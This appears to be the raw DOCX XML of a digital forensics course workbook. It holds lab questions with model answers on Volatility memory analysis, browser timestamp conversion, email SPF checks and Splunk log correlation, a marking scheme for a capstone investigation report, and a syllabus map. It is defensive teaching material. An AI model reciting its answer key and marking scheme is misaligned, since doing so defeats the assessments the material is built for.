          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Theory to revise:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> RAM acquisition and Volatility plugins (Sections 2.11, 5.5).</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rPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vol -f mem.raw windows.info</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vol -f mem.raw windows.pslist</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vol -f mem.raw windows.pstree</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vol -f mem.raw windows.netstat</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vol -f mem.raw windows.cmdline</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">strings -n 8 mem.raw | head -n 10</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Q1. The process tree shows cmd.exe spawned from svchost.exe. Why is it suspicious? What legitimate reasons exist?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">svchost.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> hosts Windows services and does not normally open a command prompt. A cmd.exe child can mean </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">code injection into svchost, a malicious or exploited service, or remote command execution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. Legitimate causes: a service or scheduled task (the Task Scheduler runs inside svchost) running a batch file, administrative or management tools, or software installers/updaters. Check the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">command line, user, time, parent chain, network connections</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> and compare with logs before concluding.</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Q2. The strings output contains http://malicious-c2.com/beacon. What behaviour does it suggest?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Command-and-control </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">beaconing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> — the malware contacts a remote server to check in, receive commands or send data. The URL is an IOC to search in DNS, proxy and firewall logs; it should be confirmed with network evidence.</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7 — Browser and Email Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Theory to revise:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> browser artefacts and timestamps (Section 3.4), email headers, SPF/DKIM/DMARC (Section 4.6).</w:t>
      </w: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Q1. Convert the Chrome (WebKit) timestamp 13350000000000000.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Divide by 1,000,000 → 13,350,000,000 s since 1 Jan 1601. Subtract 11,644,473,600 s (1601 → 1970) → 1,705,526,400 Unix seconds = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">17 January 2024, 21:20:00 UTC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">.</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Q2. SPF result is softfail. What does it mean and is it enough to block the email?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Softfail (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">~all</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">) means the sending server is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">probably not authorised</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> by the domain, but the domain owner asked receivers to treat it as suspicious rather than reject it. It is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">not sufficient alone</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">: check DKIM, DMARC alignment, the Received path, sender IP reputation, domain age/look-alike, links and attachments — then decide to quarantine, flag or block.</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Email report item</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to include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Hop-path diagram</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Each Received header (server, IP, time) from the sender to the recipient, drawn bottom to top</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Originating IP details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WHOIS owner, country, hosting provider/VPN, reputation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SPF/DKIM/DMARC</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Result of each check and what it means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Verdict</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Spoofed / genuine / compromised account — with reasons and level of certainty</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8 — Splunk Multi-Source Correlation and IR Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Theory to revise:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> log correlation, lateral movement, dashboards (Section 4.4–4.5, 5.2).</w:t>
      </w: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Q1. How does correlating three log sources help?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Each source shows a different part: the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">web log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> shows the attack payload (SQL injection), the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">firewall log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> shows which connections were allowed or blocked, and the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Security log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> shows identity and logon success. Linked through the common </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">attacker IP, user and time</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, they reveal the full attack chain, confirm whether the attack succeeded, fill gaps left by any single log and give greater confidence for the report.</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rPr>
          <w:cantSplit w:val="false"/>
        </w:trP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Q2. The web log shows SQL injection from 10.5.5.20, but the firewall shows it was blocked 5 minutes earlier. What does the contradiction tell you?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">It means the block was </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">not effective or not applicable</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> — for example the block rule covered a different port, interface or firewall; the block was temporary or removed; the attacker used another path (proxy, NAT, VPN); or the two logs have </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">clock differences</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. It must not be ignored: verify time synchronisation, check rule configuration and log fields, and review the web server’s responses to see if the injection succeeded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Capstone — Full Forensic Investigation Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a simulated insider data-exfiltration incident, with a Windows disk image, a memory dump and a PCAP file. You must determine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">what data was accessed, when, how it was exfiltrated, and whether malware was involved.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The report follows the structure in Section 5.8.</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Report section</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you write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Case details and chain of custody</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Case number, date, examiner, evidence list (disk image, memory dump, PCAP), acquisition details, hashes, custody form</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 and methodology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Questions to answer, evidence examined, steps (verify hashes → analyse disk → analyse memory → analyse network → correlate)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 used (with versions)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FTK Imager 4.x, Autopsy 4.x, Volatility 3, Wireshark, Splunk Free, etc., and the purpose of each</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Findings timeline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Chronological table: timestamp (UTC), artefact, event, significance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Detailed findings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For each finding: artefact, location, timestamp, observation, forensic significance, screenshot</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Conclusion</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Direct answers to the four questions, with certainty levels and limitations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Recommendations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Technical and policy actions (USB control, DLP, logging, MFA, monitoring)</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Appendix</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Hash values of all evidence items, chain-of-custody form, supporting outputs</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rPr>
          <w:cantSplit w:val="false"/>
        </w:trP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Marking scheme (30 marks)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Artefact identification accuracy </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> · Timeline reconstruction quality </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> · Report legal defensibility and writing </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. Make sure every finding is traceable to an artefact and a timestamp, and that facts and interpretation are clearly separated.</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Syllabus Coverage Map and Quick Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Syllabus Coverage Map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this table to confirm that every topic of the official syllabus is covered, and to find it quickly.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975"/>
        <w:gridCol w:w="6335"/>
        <w:gridCol w:w="2436"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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Unit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="633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Syllabus topic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Definition, scope, types of digital forensics (disk, memory, network, mobile, cloud, email)</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1.1, 1.2</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Goals of investigation; digital evidence; what counts as evidence</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1.3, 1.4</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Locard’s Exchange Principle in the digital context</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1.5</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Investigation process: Identification, Preservation, Collection, Examination, Analysis, Reporting</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1.6</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Chain of custody — why, how, case walkthrough</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1.7</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Legal and ethical aspects; IT Act 2000; Indian Evidence Act (electronic records); Daubert/Frye</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1.8</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Investigator roles, responsibilities, documentation best practices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1.9</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Common pitfalls: contamination, tool validation, anti-forensics awareness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1.10</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Forensic operating systems (CAINE, SIFT)</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1.11</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Volatile vs non-volatile data; order of volatility</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2.1, 2.2</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Live vs dead acquisition</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2.3</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Write blockers (hardware vs software)</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2.4</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Imaging tools (FTK Imager, dd, EnCase, Autopsy); bit-stream copy</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2.5</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Hash verification (MD5, SHA-1, SHA-256)</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2.6</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Case studies; chain-of-custody fields during imaging</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2.7, 2.12</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Deleted-file recovery, file carving, slack space, unallocated space; file signatures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2.8, 2.9</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Password recovery and bypass (overview, ethical context)</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2.10</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RAM/memory acquisition basics, tools (FTK Imager, Belkasoft RAM Capturer)</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2.11</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Evidence storage and handling</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2.12</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Windows file system internals: FAT vs NTFS, MFT, $MFT, $LogFile, deleted-file recovery</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3.1</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Registry hives (SAM, SECURITY, SOFTWARE, SYSTEM, NTUSER.DAT); USB, recent files, installed software keys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3.2</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Event logs (Security, System, Application)</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3.3</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Browser artefacts (history, cache, cookies, downloads)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3.4</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Prefetch, LNK files, shellbags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3.5</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Timeline analysis with log2timeline / Plaso</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3.6</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Linux forensics: ext3/ext4, key directories, logs, bash_history, user accounts, cron</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3.7</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 overview (Autopsy, Sleuth Kit, FTK); hands-on case scenario</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3.8, 3.9</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 forensics fundamentals; what and where to capture (TAPs, SPAN)</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4.1</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Wireshark packet analysis for forensics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4.2</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NetFlow and traffic-flow analysis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4.3</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Firewall, proxy and IDS log analysis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4.4</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Identifying C2 traffic, data exfiltration, lateral movement</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4.5</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Email forensics: headers, tracing source, spoofing</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4.6</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Cloud forensics: shared responsibility, jurisdiction, AWS/Azure/GCP acquisition</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4.7</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Dark web overview and challenges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4.8</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Encryption challenges in forensics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4.9</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Mobile forensics: iOS vs Android acquisition, common artefacts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4.10</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IR lifecycle — NIST SP 800-61 phases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5.1, 5.2</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How forensics integrates with IR; first responder; preserving volatile data</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5.3, 5.4</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Malware forensics: static vs dynamic analysis; sandbox tools (Cuckoo, Any.Run, FLARE VM)</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5.5</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Ransomware case study (plus phishing and insider response)</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5.6, 5.7</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Report writing; technical and non-technical audiences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5.8</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Presenting evidence: affidavits, expert witness testimony</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5.9</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633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Case studies — Indian and international cybercrime cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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5.10</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633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Emerging trends: AI in forensics, anti-forensic techniques, IoT forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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5.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
